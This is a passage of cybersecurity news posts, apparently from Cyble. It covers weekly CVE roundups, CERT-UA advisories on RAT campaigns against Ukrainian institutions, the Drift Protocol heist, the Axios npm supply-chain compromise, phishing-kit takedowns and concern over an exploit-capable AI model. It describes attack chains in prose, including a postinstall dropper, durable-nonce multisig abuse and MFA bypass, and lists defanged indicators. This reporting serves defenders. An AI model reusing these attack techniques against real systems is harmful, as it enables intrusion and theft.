Furthermore, CISA added 3 vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, confirming active exploitation in the wild.

On the industrial front, CISA issued 5 ICS advisories covering 6 vulnerabilities, impacting vendors such as Siemens, Hitachi Energy, and Yokogawa.

Weekly Vulnerability Report’s Top 5 Vulnerabilities

CVE-2026-32213 — Microsoft Azure AI Foundry (Critical)

CVE-2026-32213 is a critical authorization bypass vulnerability in Microsoft Azure AI Foundry.

The flaw exists in the platform’s authorization logic, allowing unauthenticated attackers to bypass security checks and grant themselves administrative privileges. Successful exploitation enables full control over AI environments and associated resources.

CVE-2026-35022 — Claude Code CLI / Agent SDK (Critical)

CVE-2026-35022 is a critical OS command injection vulnerability affecting Anthropic’s Claude Code CLI and Agent SDK.

The vulnerability allows attackers to inject malicious commands into development workflows, resulting in remote code execution and potential compromise of AI pipelines.

CVE-2026-22738 — Spring AI (Critical)

CVE-2026-22738 is a remote code execution vulnerability in Spring AI caused by improper input sanitization in expression evaluation.

Attackers can inject malicious expressions that are executed by the Spring Expression Language, leading to complete application and server compromise.

CVE-2026-4631 — Cockpit (Critical)

CVE-2026-4631 is an unauthenticated remote code execution vulnerability in Cockpit, a web-based Linux server management interface.

The flaw allows attackers to execute arbitrary commands without authentication, potentially leading to full system takeover in enterprise environments.

CVE-2026-35616 — Fortinet FortiClient EMS (Critical)

CVE-2026-35616 is a critical authentication bypass vulnerability in Fortinet FortiClient EMS.

Attackers can bypass authentication and execute arbitrary commands, leading to complete compromise of endpoint management systems.

Vulnerabilities Added to CISA KEV

CISA continues to expand its KEV catalog, reflecting real-world exploitation trends.

Notable addition:

CVE-2026-35616 — Fortinet FortiClient EMS
This vulnerability enables authentication bypass and remote command execution, making it a high-priority remediation target.

The inclusion of enterprise security tools in KEV highlights attackers’ focus on compromising centralized management systems.

Critical ICS Vulnerabilities

CISA issued 5 ICS advisories covering 6 vulnerabilities, many of which impact critical infrastructure environments.

CVE-2026-1579 — PX4 Autopilot (Critical)

A missing authentication vulnerability allowing attackers to execute critical functions without credentials.

This flaw poses risks to autonomous and unmanned systems, potentially enabling unauthorized control.

CVE-2026-3356 — Anritsu Systems (Critical)

This vulnerability involves missing authentication in Anritsu devices, allowing attackers to gain unauthorized access.

CVE-2025-10492 — Hitachi Energy Ellipse (Critical)

A deserialization vulnerability enabling attackers to execute arbitrary code within industrial systems.

Siemens SICAM 8 (Chained Risk)

Two vulnerabilities affecting Siemens SICAM 8 systems—resource exhaustion and out-of-bounds write—can be chained together.

This creates a denial-of-service risk capable of disrupting industrial processes and operational visibility.

CVE-2025-7741 — Yokogawa CENTUM VP (Medium)

A hard-coded password vulnerability that weakens authentication mechanisms and increases risk of unauthorized access.

Critical Infrastructure Sectors Spotlight

Analysis indicates:

• Critical Manufacturing appears in 66.7% of vulnerabilities
• Cross-sector exposure spans:
  • Transportation Systems
  • Emergency Services
  • Defense Industrial Base
  • Communications

This highlights interconnected infrastructure risks, where a single vulnerability can cascade across multiple sectors.

Conclusion

This week’s findings highlight several critical trends:

• Expansion of vulnerabilities into AI and development ecosystems
• Increasing exploitation of enterprise management platforms
• Continued weaknesses in industrial control systems
• Cross-sector risk amplification in critical infrastructure

With 270+ PoCs, KEV-confirmed exploitation, and emerging threats in AI frameworks, organizations face heightened risk across both digital and physical environments.

Key Recommendations

• Prioritize vulnerabilities with PoCs and KEV inclusion
• Secure AI development environments and pipelines
• Patch enterprise management and remote access systems immediately
• Implement strict authentication and access control mechanisms
• Segment IT and OT networks to prevent lateral movement
• Apply compensating controls for unpatched ICS vulnerabilities
• Monitor underground forums and threat intelligence feeds
• Conduct continuous vulnerability assessments and penetration testing

---

Cyble’s attack surface management and vulnerability intelligence solutions help organizations proactively identify risks, prioritize remediation, and detect emerging threats. By integrating intelligence-driven security strategies, organizations can strengthen resilience across enterprise and critical infrastructure environments.

The post The Week in Vulnerabilities: Azure AI, Spring AI, Fortinet, and Critical ICS Exposure appeared first on Cyble.

Ukrainian cyber defenders reported a newly intensified cyber campaign that is targeting Ukraine’s healthcare system and local government agencies, with attackers deploying increasingly sophisticated malware and social engineering tactics.

In a fresh advisory, the CERT-UA said the activity—linked to a threat cluster tracked as UAC-0247—spiked between March and April 2026, with clinical hospitals, emergency services, and municipal bodies bearing the brunt of the attacks.

UAC-0247 Used Humanitarian Aid Lures as Entry Point

The campaign begins with phishing emails disguised as offers of humanitarian assistance—a tactic designed to exploit trust during wartime conditions. Victims are urged to click on links that appear legitimate, sometimes backed by convincingly crafted fake websites or compromised third-party resources.

Behind the scenes, however, the links trigger a multi-stage infection chain that ultimately gives attackers remote control over the victim’s system.

Once clicked, victims download an archive containing a malicious shortcut file. This file activates a built-in Windows tool to execute remote code, initiating a sequence that includes decoy documents to avoid suspicion.

Also read: Hackers Impersonate Ukrainian CERT to Plant a RAT on Government, Hospital Networks

The attack escalates quickly. Malicious executables are deployed via scheduled tasks, injecting code into legitimate system processes such as RuntimeBroker.exe to evade detection.

Recent campaigns show an evolution in sophistication, with attackers introducing multi-stage loaders and custom executable formats. Payloads are often encrypted and compressed, making analysis and detection more difficult.

At later stages, attackers deploy reverse shell tools—including variants resembling “RAVENSHELL”—to establish encrypted communication with command-and-control servers and execute remote commands.

Persistent Access and Remote Control

To maintain long-term access, attackers install a custom backdoor known as AGINGFLY, a C#-based malware designed for full remote system control. The tool enables:

• Command execution
• File exfiltration
• Screenshot capture
• Keylogging

Unlike conventional malware, AGINGFLY dynamically retrieves and compiles its command logic from remote servers, making it more adaptable and harder to detect.

Complementing this is a PowerShell-based tool dubbed SILENTLOOP, which helps maintain persistence and retrieves command server addresses—sometimes even pulling them from Telegram channels.

Credential Theft and Lateral Movement

Once inside a network, attackers move quickly to expand access. CERT-UA observed tools like CHROMELEVATOR being used to extract browser credentials, while ZAPIXDESK targets WhatsApp data.

The attackers also conduct internal reconnaissance using both custom scripts and publicly available tools such as RUSTSCAN. For stealthy movement across networks, tunneling tools like LIGOLO-NG and CHISEL are deployed.

In at least one case, attackers went further—embedding the XMRIG cryptocurrency miner inside a modified version of the legitimate WireGuard application, highlighting a secondary motive of financial gain.

Military Targets Also in Scope

The campaign isn’t limited to civilian infrastructure. CERT-UA noted an incident in March where individuals connected to Ukraine’s defense sector were targeted via the Signal platform.

Attackers distributed a trojanized version of software used by FPV drone operators, packaged as a seemingly legitimate update. In reality, the download triggered a DLL side-loading attack that installed the AGINGFLY backdoor.

CERT-UA recommends reducing exposure by restricting the execution of high-risk file types such as LNK, HTA, and JavaScript files. The agency also urges organizations to limit the use of native Windows tools like mshta.exe and PowerShell where possible, as these are frequently abused in attacks.

Goldman Sachs is taking a cautious approach toward a new artificial intelligence model from Anthropic, warning that its advanced capabilities could introduce significant cybersecurity risks—even as they explore its long-term potential.

The model, known as "Mythos," has sparked concern across the financial sector due to its ability to identify and exploit software vulnerabilities at a level that could reshape both cyber defense and cybercrime.

“Hyperaware” of AI-Driven Cyber Risks

Answering a query during a recent earnings call, Goldman Sachs CEO David Solomon said the bank is closely monitoring the risks associated with emerging AI systems including LLMs and the disruptive Mythos model from Anthropic.

“We’re hyperaware,” Solomon said, referring to the cybersecurity implications of next-generation AI tools.

He added that Goldman is actively working with Anthropic and cybersecurity partners to better understand how such models could impact financial systems and cyber defenses.

Cybersecurity has long been at the core of our business. And we have for a very, very long time, put enormous resources forward," Solomon added.

"With the help of the US government and the model publishers, we are very focused on supplementing our cyber and infrastructure resilience," he said. "And this is part of our ongoing capabilities that we have been investing in and are accelerating our investment in."

The comments reflect the current mindset of major financial institutions, which are increasingly treating advanced AI not just as a productivity tool, but as a potential security disruptor.

Also read: AI Legal Risks: Lisa Fitzgerald on Why Businesses Must Vet AI Use Cases

Why Mythos is Raising Concerns

Unlike earlier AI systems, Mythos is designed to autonomously discover and exploit vulnerabilities in software environments. Anthropic has acknowledged that the model can “find and exploit sophisticated vulnerabilities” and, in some cases, outperform human experts.

This capability has triggered concern among cybersecurity community, who are divided and warn that such tools could lower the barrier for cyberattacks. In practical terms, even individuals without deep technical expertise could potentially use AI to identify weaknesses in operating systems, applications, or enterprise infrastructure.

Anthropic itself has taken an unusually cautious stance. The company has restricted access to Mythos and opted not to release it publicly, citing fears of misuse.

Instead, the model is being shared as a preview to 11 organizations under a controlled initiative dubbed "Project Glasswing." The organizations includes JPMorgan, Apple, Google, Microsoft, Nvidia and Goldman Sachs, among other. The initiative aims at strengthening defenses before rolling out wider deployment.

Financial Sector on High Alert

The concerns are not limited to Goldman Sachs. Discussions involving top U.S. financial leaders—including regulators and central banking officials—have reportedly taken place to assess the risks posed by such AI systems.

Banks are particularly vulnerable due to their complex mix of modern and legacy systems, which could provide fertile ground for AI-driven vulnerability discovery and exploitation.

At the same time, industry leaders see a dual-edged reality where attackers could benefit first, defenders may eventually use similar tools to identify and patch weaknesses faster.

Balancing Risk and Opportunity

Despite the warnings, Solomon struck a measured tone about the future of AI in business. He noted that the technology has the potential to significantly improve efficiency and transform operations across industries.

"Whenever you have acceleration of your technology, there are going to be be bumps, and there are going to be risk issues," Solomon said answering a seperate query during the call. "But the power of the technology, the ability to use it in an enterprise, to remake processes, to create efficiency, and also create more capacity to invest the growth — I can't find a CEO that's not talking about that."

This tension—between innovation and risk—sits at the center of the current debate around advanced AI systems like Mythos.

A Turning Point for Cybersecurity

The emergence of models capable of autonomously identifying and exploiting vulnerabilities marks a potential inflection point for cybersecurity.

Experts suggest that the rapid evolution of AI could accelerate both offensive and defensive capabilities, creating a race between attackers and defenders. In the short term, however, the concern is that powerful tools may be easier to weaponize than to secure.

For financial institutions like Goldman Sachs, however, the strategy seems to be to engage early, understand the risks, and prepare defenses before such technologies become widely accessible.

An international operation, coordinated between the FBI Atlanta Field Office and Indonesian law enforcement agencies has led to a taken down of a major phishing infrastructure that enabled cybercriminals worldwide to steal credentials and attempt fraud exceeding $20 million.

The crackdown targeted a cybercrime ecosystem built around the “W3LL phishing kit,” a tool designed to replicate legitimate login pages and harvest user credentials at scale. Authorities say the platform allowed attackers to compromise thousands of accounts and carry out widespread financial fraud.

More Than a Phishing Tool

Investigators describe W3LL not as a single piece of malware, but as a fully developed “phishing-as-a-service” operation. For a relatively low cost of around $500, cybercriminals could purchase access to the kit and launch highly convincing phishing campaigns with minimal technical expertise.

The service was supported by an underground marketplace known as W3LLSTORE, where stolen credentials were bought and sold. Between 2019 and 2023, more than 25,000 compromised accounts were traded through the platform.

Even after the marketplace was shut down, the operation continued through private and encrypted channels, allowing it to evolve and remain active.

Also read: New Phishing Kit ‘FishXProxy’ Aims To Be ‘Ultimate Powerful Phishing Kit’

Built for Corporate Account Takeovers

According to research by Group-IB, the W3LL ecosystem was specifically designed to target corporate environments, particularly business email systems such as Microsoft 365.

The toolkit included a range of capabilities beyond simple phishing pages, forming an end-to-end attack chain. These included tools for:

• Sending large-scale phishing emails
• Harvesting and validating email accounts
• Hosting malicious infrastructure
• Managing stolen credentials

Group-IB estimates that around 500 threat actors were actively using W3LL tools, turning the platform into a structured cybercrime network rather than a loose collection of attackers.

Bypassing Multi-Factor Authentication

One of the most dangerous aspects of the W3LL kit was its use of adversary-in-the-middle (AitM) techniques. This allowed attackers to intercept login sessions in real time, capturing not just usernames and passwords but also authentication tokens.

As a result, even accounts protected by multi-factor authentication (MFA) could be compromised, giving attackers persistent access to corporate systems.

Security researchers say this capability made W3LL particularly effective in business email compromise (BEC) attacks—one of the most financially damaging forms of cybercrime today.

Global Scale and Impact

The phishing kit was used in attacks targeting organizations across multiple industries, including finance, healthcare, manufacturing, and IT services.

Data suggests that tens of thousands of corporate accounts were targeted globally, with a significant concentration of victims in the United States, followed by Europe and Australia.

Between 2023 and 2024 alone, the infrastructure was linked to more than 17,000 phishing attempts worldwide.

Arrest and Infrastructure Seizure

As part of the operation, authorities seized domains and infrastructure used to distribute the phishing kit and facilitate credential theft. Indonesian police also detained the suspected developer behind the platform, identified only as “G.L.”

Officials say this marks a significant step in targeting not just users of cybercrime tools, but the developers who enable large-scale attacks.

Cyble Research & Intelligence Labs (CRIL) weekly vulnerability report tracked 1,960 vulnerabilities last week, reflecting a continued surge in vulnerability disclosures across enterprise and cloud ecosystems.

Of these, 248 vulnerabilities have publicly available Proof-of-Concept (PoC) exploits, significantly increasing the likelihood of real-world attacks and accelerating exploitation timelines.

Additionally, at least 5 vulnerabilities were actively discussed across underground forums, indicating strong attacker interest and rapid weaponization.

A total of 214 vulnerabilitieswere rated critical under CVSS v3.1, while 57 were rated critical under CVSS v4.0.

Furthermore, CISA added 4 vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, confirming active exploitation in the wild.

On the industrial side, CISA issued 7 ICS advisories covering 10 vulnerabilities, impacting vendors such as Schneider Electric, WAGO, and PTC.

Weekly Vulnerability Report's Top 5 CVE's

CVE-2026-32917 — OpenClaw (Critical)

CVE-2026-32917 is a critical remote command injection vulnerability affecting OpenClaw, an AI agent framework.

The flaw occurs in the iMessage attachment staging workflow, allowing attackers to inject commands into remote systems. Successful exploitation enables arbitrary command execution, potentially leading to full system compromise.

CVE-2026-4747 — FreeBSD RPCSEC_GSS (Critical)

CVE-2026-4747 is a critical stack-based buffer overflow vulnerability in FreeBSD caused by improper bounds checking in packet handling.

Attackers can send specially crafted requests to trigger a stack overflow, resulting in remote code execution with kernel-level privileges, enabling full system takeover.

CVE-2026-31883 — FreeRDP (Critical)

CVE-2026-31883 is a heap-based buffer overflow vulnerability in FreeRDP’s audio decoding components.

A malicious RDP server or man-in-the-middle attacker can exploit this flaw to execute arbitrary code, potentially compromising remote desktop clients and enterprise environments.

CVE-2026-1207 — Django (High)

CVE-2026-1207 is a SQL injection vulnerability in Django applications using PostGIS RasterField lookups.

Insufficient input validation allows attackers to inject malicious SQL queries, leading to data exposure, modification, and potential lateral movement within backend systems.

CVE-2025-53521 — F5 BIG-IP APM (Critical)

CVE-2025-53521 is a critical vulnerability in F5 BIG-IP Access Policy Manager, initially classified as a DoS flaw but later reclassified as unauthenticated remote code execution following active exploitation.

This vulnerability allows attackers to gain full control of access management systems, posing significant risks to enterprise networks.

Vulnerabilities Added to CISA KEV

CISA continued expanding its KEV catalog, reflecting active exploitation trends.

Notable addition:

CVE-2025-53521 — F5 BIG-IP APM
Initially considered a denial-of-service flaw, it was reclassified as a remote code execution vulnerability after evidence of active exploitation emerged.

This shows how vulnerabilities can evolve in severity over time, reinforcing the need for continuous reassessment and monitoring.

Critical ICS Vulnerabilities

CISA issued 7 ICS advisories covering 10 vulnerabilities, with several rated critical.

CVE-2026-2417 — Pharos Controls (Critical)

This vulnerability involves missing authentication for critical functions in Mosaic Show Controller firmware.

Attackers can exploit this flaw to gain unauthorized control over industrial systems, potentially disrupting operations.

CVE-2025-49844 — Schneider Electric Plant iT/Brewmaxx (Critical)

A use-after-free vulnerability in Schneider Electric’s industrial automation platform can lead to memory corruption and system compromise.

The presence of multiple vulnerabilities in this platform reflects systemic risk across widely deployed industrial environments.

CVE-2026-3587 — WAGO Managed Switches (Critical)

This vulnerability exposes hidden functionality in industrial switches, potentially enabling attackers to bypass controls and gain unauthorized access.

CVE-2026-4681 — PTC Windchill PDMLink (Critical)

This vulnerability involves improper control of code generation and currently has no available patch, leaving organizations exposed.

Grassroots DICOM (High, Unpatched)

A memory management flaw in Grassroots DICOM impacts healthcare imaging systems, with no vendor patch available, increasing risk to medical infrastructure.

Impacted Critical Infrastructure Sectors

Analysis shows that:

Commercial Facilities appear in 70% of ICS vulnerabilities

Critical Manufacturing and Energy each account for 60%

Healthcare, communications, and transportation sectors also face exposure.

This distribution shows the strong cross-sector dependencies, where vulnerabilities in industrial platforms can cascade into multiple critical infrastructure domains.

Conclusion

This week’s findings highlight a convergence of:

• Increasing vulnerability volume and severity
• Rapid exploitation cycles driven by PoC availability
• Active underground discussion and weaponization
• Persistent weaknesses in industrial control systems

With 248 publicly available PoCs, KEV additions confirming active exploitation, and unpatched ICS vulnerabilities, organizations face significant risk across both enterprise IT and operational technology environments.

Key Recommendations

• Prioritize vulnerabilities based on exploit availability and operational impact
• Patch critical enterprise systems and externally exposed services immediately
• Implement strong input validation and secure coding practices
• Harden remote access and RDP environments
• Segment IT and OT networks to limit lateral movement
• Apply compensating controls for unpatched ICS vulnerabilities
• Continuously monitor threat intelligence and underground forums
• Conduct regular vulnerability assessments and penetration testing

Cyble’s attack surface management and vulnerability intelligence solutions enable organizations to identify exposed assets, prioritize remediation, and detect early indicators of compromise. By combining threat intelligence with proactive defense strategies, organizations can effectively mitigate evolving risks across enterprise and critical infrastructure environments

The post The Week in Vulnerabilities: OpenClaw, FreeBSD, F5 BIG-IP, and Critical ICS Bugs appeared first on Cyble.

A cybercriminal group identified as UNC6783 is targeting business process outsourcing (BPO) companies likely as a gateway to infiltrate major organizations across various industries. The Google Threat Intelligence Group reports that this tactic has already affected dozens of companies, with attackers stealing sensitive information to pressure victims into paying ransoms. According to principal threat analyst Austin Larsen, the group primarily depends on phishing schemes and social engineering tactics to compromise BPO providers that support their intended targets. In some cases, attackers have gone a step further by directly engaging with internal support or helpdesk teams to gain unauthorized access. Investigators also believe UNC6783 may be connected to a cybercriminal persona known as “Raccoon,” which has previously focused on BPO firms serving large enterprises.

Also read: Singapore Launches Largest-Ever Cyber Defense Operation After UNC3886 Targets All Major Telcos

One notable technique involves manipulating support staff through live chat interactions. Employees are tricked into visiting counterfeit login pages that mimic Okta portals. These fraudulent sites are hosted on domains designed to resemble legitimate ones, often following a pattern like [.]zendesk-support<##>[.]com. Larsen notes that the phishing toolkit used in these campaigns is particularly advanced—it can capture clipboard data, allowing attackers to bypass multi-factor authentication (MFA) and register their own devices within compromised systems. In addition to phishing, the group has also distributed fake security updates that install remote access malware, further expanding their control over victim networks. Once data is obtained, the attackers initiate extortion efforts, typically reaching out via ProtonMail accounts to demand payment in exchange for not releasing the stolen information. Although further details about “Raccoon” remain limited, the International Cyber Digest recently reported that an individual using the alias “Mr. Raccoon” claimed responsibility for a breach involving Adobe—a claim that has not yet been confirmed. According to these claims, the breach occurred after compromising an India-based BPO associated with Adobe. The attacker allegedly installed a remote access trojan (RAT) on an employee’s system and later targeted the employee’s manager through a phishing campaign. The individual further asserted that approximately 13 million support tickets were stolen, including personal data, employee details, vulnerability reports submitted via HackerOne, and internal company documents. To mitigate risks from UNC6783, Google’s Mandiant division recommends several defensive measures. These include adopting FIDO2-based hardware keys for MFA, closely monitoring live chat systems for suspicious activity, blocking domains that mimic Zendesk naming patterns, and routinely reviewing MFA device registrations for unauthorized additions.

The message Drift Protocol posted to X on April 1, opened with an unusual disclaimer: "This is not an April Fools joke." Within hours, the reason became clear. A $285 million exploit had wiped out more than half of the Solana-based decentralized perpetual futures exchange's total value locked — and the attack had been in preparation for six months. A malicious actor gained unauthorized access to Drift Protocol through a novel attack involving durable nonces, resulting in a rapid takeover of Drift's Security Council administrative powers. The incident, which took place on April 1, was confirmed as a highly sophisticated operation involving multi-week preparation and staged execution. Drift is the largest decentralized perpetual futures exchange on Solana, a blockchain network. It allows users to trade leveraged financial positions without a centralized intermediary. The protocol held approximately $550 million in user assets before the attack. According to TRM Labs, the drain took roughly 12 minutes, making this the largest DeFi hack of 2026 and the second-largest exploit in Solana's history, behind only the $326 million Wormhole bridge hack in 2022.

A Six-Month Long-Con Operation

A North Korean state-linked group spent roughly six months infiltrating Drift Protocol under the guise of a quantitative trading firm before executing the exploit. The attackers built trust by meeting Drift contributors at conferences, depositing more than $1 million, and integrating an Ecosystem Vault. They then compromised devices via a malicious TestFlight app and a VSCode/Cursor vulnerability to obtain multisig approvals. On-chain staging began on March 11, nearly three weeks before the April 1 execution, with a 10 ETH withdrawal from Tornado Cash. The funds began moving at around 12:00 AM GMT on March 12 — approximately 9:00 AM Pyongyang time — and shortly after funded the deployment of CarbonVote Token (CVT), the fictitious asset used to manipulate Drift's price oracles.

The Fake Token That Fooled an Oracle

A key element of the attack was entirely manufactured. The attacker created CarbonVote Token (CVT), minting around 750 million units, seeded a small liquidity pool of approximately $500 on the Raydium decentralized exchange, and used wash trading — artificial back-and-forth trades between attacker-controlled wallets — to build a price history near $1. Over time, this artificial price was picked up by oracles, making the token appear legitimate. An oracle, in the context of blockchain protocols, is a system that feeds real-world price data into smart contracts so that a protocol knows the value of the assets it holds. By manufacturing a fake price history for a worthless token, the attackers tricked Drift's oracles into treating CVT as legitimate collateral worth hundreds of millions of dollars.

Durable Nonces: The Governance Weapon

The attack's most novel element exploited a legitimate Solana feature called durable nonces. By securing two misleading approvals from Drift's five-member Security Council multisig, the attacker pre-signed transactions that remained valid for more than a week, then used them to seize protocol-level control in minutes. A multisig — short for multi-signature — is a governance structure where multiple people must approve any administrative action, so compromising one person is insufficient. Durable nonces allow transactions on Solana to be pre-signed and executed later, a feature designed for operational convenience. In this attack, the attackers obtained two of the five required signatures through social engineering — presenting the signers with what appeared to be routine transactions — and held those approvals dormant until execution day. When Drift executed a legitimate Security Council migration on March 27, the attacker adapted. By March 30, new nonce activity appeared tied to a member of the updated multisig, indicating the attacker had re-obtained the required two-of-five approval threshold under the new configuration. On April 1, two transactions, four slots apart on the Solana blockchain, created and approved a malicious admin transfer, then executed it. Within minutes, the attacker had full control of Drift's protocol-level permissions and used it to introduce a fraudulent withdrawal mechanism and drain the vaults.

DPRK Attribution and Laundering

Investigators attributed the attack to UNC4736, a North Korean state-affiliated group also tracked as AppleJeus or Citrine Sleet, based on both on-chain fund flows tracing back to the Radiant Capital attackers and operational overlap with known DPRK-linked personas. Stolen assets were consolidated and swapped into USDC and SOL, then partially bridged to Ethereum using Circle's Cross-Chain Transfer Protocol. On Ethereum, portions were converted into ETH while some funds moved through centralized exchanges. On-chain investigator ZachXBT publicly criticized Circle for failing to freeze the stolen USDC despite it crossing during U.S. business hours, contrasting that inaction with Circle's recent decision to freeze unrelated corporate wallets in a civil case. If confirmed, the Drift incident would represent the eighteenth DPRK-linked crypto theft Elliptic has tracked in 2026, with over $300 million stolen to date. DPRK-linked actors have stolen over $6.5 billion in cryptoassets in recent years, with proceeds linked to funding North Korea's weapons programs. The Drift exploit did not occur in isolation. It landed on the same day multiple security vendors attributed the Axios npm supply chain attack to North Korean group UNC1069 — a simultaneous two-front operation against the software development ecosystem and the crypto finance layer that funds Pyongyang's strategic programs.

Read: North Korea’s Lazarus Group Behind the Axios npm Supply Chain Attack

Drift has frozen all protocol functions, removed the compromised wallet from the multisig, and is coordinating with security firms, exchanges, bridges, and law enforcement to trace and recover stolen assets. A detailed postmortem is expected. The DRIFT token fell more than 20% following news of the exploit.

On Monday, the Axios npm supply chain attack came to light where malicious packages had been inserted into one of JavaScript's most widely used libraries. Three major threat intelligence firms have now attributed the attack to North Korea's Lazarus Group, and the scale of the fallout is considerably larger than initially understood.

The attack was confirmed as North Korean state-sponsored on when Google Threat Intelligence Group published its attribution, identifying the responsible actor as UNC1069 — a financially motivated North Korea-nexus group active since at least 2018 and tracked by Mandiant, now part of Google. ThreatBook independently reached the same conclusion, attributing the campaign to Lazarus Group based on long-term APT tracking data and overlapping infrastructure artifacts.

Between March 31, 00:21 and 03:20 UTC, an attacker introduced a malicious dependency named plain-crypto-js into axios NPM releases versions 1.14.1 and 0.30.4. Axios is the most popular JavaScript library used to simplify HTTP requests, with packages that typically have over 100 million and 83 million weekly downloads, respectively.

npm is the world's largest software registry — the system JavaScript developers use to download and install code libraries their applications depend on. A postinstall hook is a script that executes automatically, silently, the moment a developer runs npm install. The attackers exploited both to devastating effect.

How the Attack Was Staged

Analysis indicates the maintainer account associated with the axios package was compromised, with the associated email address changed to an attacker-controlled ProtonMail account. The threat actor used the postinstall hook within the package.json file of the malicious dependency to achieve silent execution. Upon installation of the compromised axios package, npm automatically executed an obfuscated JavaScript dropper named setup.js in the background.

The dropper, tracked by GTIG as SILKBELL, dynamically checks the target system's operating system and delivers platform-specific payloads.

On Windows, it copies PowerShell to a renamed binary and downloads a PowerShell script to the user's Temp directory.

On macOS, it downloads a native Mach-O binary to /Library/Caches/com.apple.act.mond. On Linux, it drops a Python backdoor to /tmp/ld.py.

After successfully dropping each payload, the dropper attempts to delete itself and revert the modified package.json. This acts as an anti-forensic cleanup step designed to remove evidence of the postinstall hook entirely.

The platform-specific payloads deploy a backdoor tracked by GTIG as WAVESHAPER.V2 — a C++ backdoor that collects system information, enumerates directories, and executes additional payloads, connecting to the command-and-control server at sfrclak[.]com:8000/6202033. GTIG's attribution to UNC1069 rests specifically on WAVESHAPER.V2 being an updated version of WAVESHAPER, a backdoor previously used by this group, combined with infrastructure overlap across past UNC1069 campaigns.

All payload variants use the same anachronistic user-agent string — an Internet Explorer 8 string on Windows XP — which is highly anomalous in 2026 and a reliable detection indicator. The C2 path /6202033, when reversed, reads 3-30-2026, the date of the attack.

The Blast Radius

The malicious axios versions were removed within a few hours, but axios is present in approximately 80% of cloud and code environments and is downloaded roughly 100 million times per week, enabling rapid exposure, with observed execution in 3% of affected environments.

Mandiant CTO Charles Carmakal framed the downstream risk in serious terms. Carmakal said the blast radius of the axios npm supply chain attack is broad and extends to other popular packages that have dependencies on it, and warned that the secrets stolen over the past two weeks will enable more software supply chain attacks, SaaS environment compromises leading to downstream customer compromises, ransomware and extortion events, and crypto heists over the next several days, weeks, and months.

He noted awareness of hundreds of thousands of stolen credentials, with a variety of actors across varied motivations behind these attacks.

GTIG Chief Analyst John Hultquist said North Korean hackers have deep experience with supply chain attacks, which they have historically used to steal cryptocurrency, and that given the popularity of the compromised package, the full breadth of the incident is still unclear but far-reaching impacts are expected.

Huntress identified approximately 135 compromised devices. However, the true number affected during the three-hour window remains under investigation.

What Defenders Should Do Now

Any engineering team that ran npm install between 00:21 UTC and approximately 03:20 UTC on March 31 should treat their environment as potentially compromised.

Defenders should check for RAT artifacts at /Library/Caches/com.apple.act.mond (macOS), %PROGRAMDATA%\wt.exe (Windows), and /tmp/ld.py (Linux); downgrade to axios 1.14.0 or 0.30.3; remove plain-crypto-js from node_modules; audit CI/CD pipeline logs for the affected window; rotate all credentials on any system where RAT artifacts are found; and block egress to sfrclak[.]com.

Ukraine's frontline cyber defense agency became the subject of its own investigation last week after an unknown threat actor built a convincing fake version of its website, sent emails impersonating its staff and instructed recipients across the country to download malware packaged as official security software. The Computer Emergency Response Team of Ukraine, CERT-UA, disclosed on Sunday, that between March 26 and 27, attackers distributed emails falsely attributed to CERT-UA, urging recipients to download a password-protected archive named either "CERT_UA_protection_tool.zip" or "protection_tool.zip". The file was made available for download from Files.fm file-sharing service and installed what the messages described as specialized protective software. The phishing emails were targeted at a broad cross-section of Ukrainian institutions including government organizations, medical centers, security companies, educational institutions, financial institutions and software development firms. Supporting the phishing campaign, attackers had registered and populated a counterfeit website at cert-ua[.]tech — a domain created on March 27, just one day into the distribution window. The look-a-like website had content lifted directly from the official CERT-UA website at cert[.]gov[.]ua, alongside fabricated instructions for downloading the malicious "protection tool." The executable file inside those archives was not protective software. CERT-UA classified it as AGEWHEEZE, a full-featured Remote Access Trojan (RAT) written in the Go programming language. A RAT is malware that gives an attacker complete remote control over an infected machine: not just file access, but live screen viewing, keyboard and mouse emulation, command execution, process and service management, clipboard reading and writing, and the ability to shut down, restart, or lock the device entirely. AGEWHEEZE's command set is exhaustive and purpose-built for persistent, covert control. It supports screen capture and real-time input emulation, full file system operations including read, write, delete, rename, and directory creation, process killing, service control, autorun management, terminal access, and the ability to open arbitrary URLs on the victim machine. AGEWHEEZE establishes persistence through the Windows registry startup key, the Startup directory, or a scheduled task, creating entries named "SvcHelper" or "CoreService" depending on the infection path. All communications to its command-and-control server route over WebSocket connections to a server hosted on infrastructure belonging to French cloud provider OVH. That command-and-control server carried its own revealing details. On port 8443, a web page titled "The Cult" displayed an authentication form. Buried in the HTML source of that page, investigators found Russian-language text reading: "Membership suspended. Your access to the Cult has been blocked. Contact the administrator to restore it." The self-signed SSL certificate on the server was created on March 18, with "TVisor" listed in the Organization field, matching the internal package name found inside the malware itself: "/example.com/tvisor/agent. Attribution arrived quickly and from the attackers themselves. A review of the AI-generated fake website at cert-ua[.]tech uncovered a line embedded in the HTML code reading: "With Love, CYBER SERP — https://t[.]me/CyberSerp_Official." [caption id="attachment_110836" align="aligncenter" width="600"] Fake website and HTML code embedding CyberSerp details. (Source: CERT-UA)[/caption] On March 28, the day after the campaign launched, the Telegram channel referenced in that code published a message claiming responsibility for the attack, eliminating any ambiguity about attribution. CERT-UA created the tracking identifier UAC-0255 for this activity. The agency assessed the cyberattack as "unsuccessful." No more than a few personal devices belonging to employees of educational institutions were identified as infected. CERT-UA said its specialists provided methodological and practical assistance to affected parties, and acknowledged Ukrainian electronic communications providers for their contribution to delivering cyber threat information to subscribers and maintaining national cyber incident response infrastructure. CERT-UA itself has previously documented campaigns by multiple threat groups — including UAC-0002, UAC-0035, and the group tracked here as UAC-0252 — that similarly weaponize government branding. In this case, the attackers targeted the cyber defense agency whose name carries the highest authority in Ukrainian information security communications, turning that trust directly against the institutions that rely on it. CERT-UA noted that the development of artificial intelligence significantly simplifies the execution of cyber threats. The attackers' own use of an AI-generated phishing site is a direct illustration of that warning, the cyber defense agency explained. It recommended that organizations reduce their attack surface by configuring standard operating system protections including Software Restriction Policies and AppLocker, and deploying specialized endpoint protection tools. Full indicators of compromise including file hashes, network indicators, and host-based artifacts are available in the CERT-UA advisory.

Also read: Hackers Exploit RDP Tools to Breach Ukraine’s Notarial Offices, CERT-UA Reports

